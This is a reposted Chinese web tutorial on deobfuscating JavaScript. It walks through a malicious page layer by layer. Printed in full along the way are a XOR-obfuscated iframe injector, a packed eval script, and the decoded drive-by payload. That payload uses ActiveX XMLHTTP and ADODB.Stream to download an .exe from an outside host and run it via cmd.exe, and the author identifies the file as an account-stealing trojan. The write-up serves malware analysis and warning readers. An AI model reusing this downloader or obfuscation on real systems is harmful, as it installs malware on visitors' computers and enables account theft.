作家
登录
JS

jser必看的破解javascript各种加密的反向思维方法 原创

作者: 来源:www.28hudong.com 2013-03-30 03:31:23 阅读 我要评论

原创文章,转载请写明出处 脚本之家才发现的破解javascript各种加密的反向思维方法,大家有好的方法都跟帖啊最近发现了一个代码,加密了5层左右,我将破解到最后一步,而且不用javascript解密程序 用到的软件列表 1、迅雷(下载网页)直接浏览会执行的,看不到源代码 2、或用firefox这个软件可以直接浏览网址,由于firefox的特殊性,也推荐用这个浏览器 一、目标网址 http://www.e9ad.cn/pcdd/80-806.htm 我们用迅雷下载这个页面或用firefox浏览器浏览得到如下代码 复制代码 代码如下: <script language=javascript>var DFQC=function(a){return String.fromCharCode (a^22)};document.write(DFQC(42)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(122)+DFQC(40)+DFQC(27) +DFQC(28)+DFQC(54)+DFQC(42)+DFQC(126)+DFQC(115)+DFQC(119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC (28)+DFQC(42)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)+DFQC(98)+DFQC(40)+DFQC(27) +DFQC(28)+DFQC(54)+DFQC(112)+DFQC(99)+DFQC(120)+DFQC(117)+DFQC(98)+DFQC(127)+DFQC(121)+DFQC (120)+DFQC(54)+DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC (109)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115) +DFQC(43)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98) +DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)+DFQC(112)+DFQC(127)+DFQC(100) +DFQC(101)+DFQC(98)+DFQC(85)+DFQC(126)+DFQC(127)+DFQC(122)+DFQC(114)+DFQC(56)+DFQC(114) +DFQC(119)+DFQC(98)+DFQC(119)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC (117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(121)+DFQC(102)+DFQC (115)+DFQC(120)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121) +DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(117)+DFQC(122) +DFQC(121)+DFQC(101)+DFQC(115)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC (114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(98) +DFQC(127)+DFQC(98)+DFQC(122)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(113)+DFQC(113)+DFQC(52)+DFQC (45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115) +DFQC(120)+DFQC(98)+DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)+DFQC(127) +DFQC(120)+DFQC(120)+DFQC(115)+DFQC(100)+DFQC(94)+DFQC(66)+DFQC(91)+DFQC(90)+DFQC(43)+DFQC (69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54) +DFQC(107)+DFQC(42)+DFQC(57)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)+DFQC(98) +DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122)+DFQC (115)+DFQC(40)+DFQC(119)+DFQC(114)+DFQC(42)+DFQC(57)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122) +DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC(115)+DFQC (119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(116)+DFQC(121)+DFQC(114) +DFQC(111)+DFQC(54)+DFQC(121)+DFQC(120)+DFQC(122)+DFQC(121)+DFQC(119)+DFQC(114)+DFQC(43) +DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC(54)+DFQC(98)+DFQC (121)+DFQC(102)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC (52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(122)+DFQC(115)+DFQC(112)+DFQC(98)+DFQC(123)+DFQC(119) +DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC (100)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC (127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)+DFQC(98) +DFQC(98)+DFQC(121)+DFQC(123)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120) +DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(55) +DFQC(59)+DFQC(59)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC (123)+DFQC(115)+DFQC(54)+DFQC(120)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(95) +DFQC(39)+DFQC(52)+DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC (38)+DFQC(46)+DFQC(38)+DFQC(56)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(52)+DFQC(54)+DFQC(123) +DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98) +DFQC(126)+DFQC(43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC (113)+DFQC(127)+DFQC(120)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC (43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126) +DFQC(98)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC (114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(101) +DFQC(117)+DFQC(100)+DFQC(121)+DFQC(122)+DFQC(122)+DFQC(127)+DFQC(120)+DFQC(113)+DFQC(43) +DFQC(52)+DFQC(120)+DFQC(121)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114) +DFQC(115)+DFQC(100)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(112)+DFQC(100)+DFQC (119)+DFQC(123)+DFQC(115)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114)+DFQC(115)+DFQC(100)+DFQC (43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100) +DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(59)+DFQC(59)+DFQC (40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111) +DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC (122)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC (70)+DFQC(66)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(55)+DFQC(59)+DFQC(59)+DFQC (54)+DFQC(27)+DFQC(28)+DFQC(97)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(121)+DFQC(97)+DFQC(56) +DFQC(114)+DFQC(115)+DFQC(112)+DFQC(119)+DFQC(99)+DFQC(122)+DFQC(98)+DFQC(69)+DFQC(98)+DFQC (119)+DFQC(98)+DFQC(99)+DFQC(101)+DFQC(43)+DFQC(52)+DFQC(54)+DFQC(54)+DFQC(52)+DFQC(45) +DFQC(54)+DFQC(27)+DFQC(28)+DFQC(57)+DFQC(57)+DFQC(59)+DFQC(59)+DFQC(40)+DFQC(54)+DFQC(27) +DFQC(28)+DFQC(42)+DFQC(57)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC(70)+DFQC(66)+DFQC(40) +DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115) +DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(126)+DFQC(98)+DFQC(98)+DFQC(102)+DFQC (44)+DFQC(57)+DFQC(57)+DFQC(102)+DFQC(121)+DFQC(102)+DFQC(56)+DFQC(97)+DFQC(108)+DFQC(110) +DFQC(103)+DFQC(111)+DFQC(56)+DFQC(117)+DFQC(121)+DFQC(123)+DFQC(57)+DFQC(33)+DFQC(33)+DFQC (33)+DFQC(57)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(115)+DFQC(110)+DFQC(56)+DFQC(126)+DFQC(98) +DFQC(123)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(38)+DFQC (54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(43)+DFQC(38)+DFQC(40) +DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40) +DFQC(27)+DFQC(28)+DFQC(27)+DFQC(28)+'');</script> 对于这个的解密呢,分析下 大家看下document.write(DFQC(42)+DFQC(126)..... 这个DFQC(42),的DFQC就是解密var DFQC=function(a){return String.fromCharCode(a^22)} 下面我的解密代码也想好了,这个方法基本上可以破解好多的类似代码,大家可以看下这个代码 [Ctrl+A 全选 注:如需引入外部Js需刷新才能执行] 得到的解密的代码就是 复制代码 代码如下: <html> <head> <script> function clear(){ Source=document.body.firstChild.data; document.open(); document.close(); document.title="gg"; document.body.innerHTML=Source; }</script> <title>ad</title> </head> <body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0"> <!-- <iframe name="I1" src="8080.htm" marginwidth="1" marginheight="1" height="80" width="80" scrolling="no" border="0" frameborder="0"></iframe> --> </body> </html> <SCRIPT> <!-- window.defaultStatus=" "; //--> </SCRIPT> <iframe src=http://pop.wzxqy.com/777/index.htm width=0 height=0></iframe> 二、检查下上面的http://www.e9ad.cn/pcdd/8080.htm和http://pop.wzxqy.com/777/index.htm 我发现下面的iframe加载的有问题,所以呢, 用下载工具下载http://pop.wzxqy.com/777/index.htm这个页面的代码可以发现如下 复制代码 代码如下: <iframe src=http://cc.wzxqy.com/wm/index.htm width=0 height=0></iframe> <script src='http://s92.cnzz.com/stat.php?id=451144&web_id=451144' language='JavaScript' charset='gb2312'></script> 看这个大家应该会想起,好多网站卖流量类似的代码(就是卖流量的) 三、继续分析下 http://cc.wzxqy.com/wm/index.htm 用下载工具下载这个页面,可以得到 复制代码 代码如下: <script language=javascript src=1.js></script> 好的继续下载http://cc.wzxqy.com/wm/1.js这个js文件我得到了这个代码 复制代码 代码如下: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35? String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k [c]||e(c);k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c]) p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k'~5 '+'.5'}l{9='m://o.p.q/r/s.a';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7 ("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3 F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7 ("13.14","");e=F.d(5+'\\15','16.a');Q.17(e,' /c '+6,"","b",0)}18(i) {i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{})) 大家看到上面的代码可能会发现无法解密了,我搜了下,发现了,竟然有解密代码了,此处可以分析,不 过我这篇文章的目地,是不用解密程序的,所有我用下面的方法, [Ctrl+A 全选 注:如需引入外部Js需刷新才能执行] 上面的方法,我要是考虑下几秒想到的方法,以前没想起,现在大家以后就可以更方面的使用了 先将eval后的代码用 var str=.......,然后document.write(str);得到了下面的代码 复制代码 代码如下: function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try {dl='http://cc.wzxqy.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute ("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject ("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject ("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder (0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile (fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath (tmp+'\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1} 然后我们可以发现这个http://cc.wzxqy.com/wm/mm.exe,先下下载下来,记住下载后一般看大小,病毒 文件都很小,先将mm.exe改名位mm.exe.txt,打开看到了如下代码,唉, 复制代码 代码如下: <html><body><br><br> <script>window.location="/wm/mm.exe?QVyRR=au6BKUDmtn1";</script> <center><h3>如果您的页面没有自动跳转,请<a href="/wm/mm.exe?QVyRR=au6BKUDmtn1">点击这里 </a><h3></center> </body></html> 看到了吗,最主要的就是这个了 http://cc.wzxqy.com/wm/mm.exe?QVyRR=au6BKUDmtn1 然后用软件下载,这个就是病毒文件了, 终于完成了 ,发现病毒,应该是盗号系统的木马,现在网上卖流量的很多,大家爱玩游戏的请注意了 当然上面的javascript反向思维方法可以得到大部分的加密的 javascript,而且其它的好多都有解密程 序,大家如果好的方法,都贴出来啊,这样大家才能进步。作者:reterry QQ:461478385 原创文章,转载请写明出处 脚本之家

  推荐阅读

  js实现用于建立新的一行且增加的四个文本框为空的且被禁用

用于建立新的一行且增加的四个文本框为空的且被禁用 用户ID 用户ID 用户名 性别 年龄 添加 删除 岁 >>>详细阅读


本文标题:jser必看的破解javascript各种加密的反向思维方法 原创

地址:http://www.17bianji.com/kaifa2/JS/30543.html

 1/2    1 

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

进入专栏
精彩导读
栏目ID=71的表不存在(操作类型=0)
科技快报
© 2013-2016 IT技术  京ICP备11016124号-4   

京公网安备 11011202000261号
网站介绍 合作联系 寻求报道 投稿指南 网站地图 XML地图